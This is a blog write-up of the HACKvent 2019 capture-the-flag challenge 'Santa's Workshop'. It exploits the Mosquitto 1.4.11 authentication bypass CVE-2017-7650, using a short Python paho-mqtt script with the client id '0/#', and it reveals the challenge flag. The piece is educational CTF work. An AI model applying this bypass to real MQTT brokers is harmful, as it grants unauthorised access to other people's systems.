Sebastian's Blog

software developer. security enthusiast.

HACKvent 2019

HV19.15 Santa’s Workshop

Challenge Description

The given page shows a counter of processed gifts. The source code reveals, that there is a connection to a MQTT broker.

Directly connecting to the MQTT broker and subscribing to the $SYS/broker/version topic, returns the following message:

mosquitto version 1.4.11 (We elves are super-smart and know about CVE-2017-7650 and the POC. So we made a genious fix you never will be able to pass. Hohoho)

So the broker is running Mosquitto 1.4.11 which does contain a vulnerability which bypasses authentication when the client id contains a hash or a plus symbol. Just using plus or hash as client id failes, using ascii characters also failed, so I thought it has to be somewhat numeric. Using 0/# as a client id works. The following python script can be used to retrieve the flag.

import paho.mqtt.client as mqtt
import sys

clientid = '0/#'

def on_connect(client, userdata, flags, rc):
    print("Connected to MQTT broker.")

def on_message(client, userdata, msg):
    print("%s: %s" % (msg.topic,msg.payload.decode()))

client = mqtt.Client(client_id=clientid, clean_session=True, transport="websockets")
client.username_pw_set("workshop", "2fXc7AWINBXyruvKLiX")

client.on_connect = on_connect
client.on_message = on_message

print("Connecting to MQTT broker")
client.connect('', 9001, 60)

The flag is HV19{N0_1nput_v4l1d4t10n_3qu4ls_d1s4st3r}.

Leave a Reply

Your email address will not be published.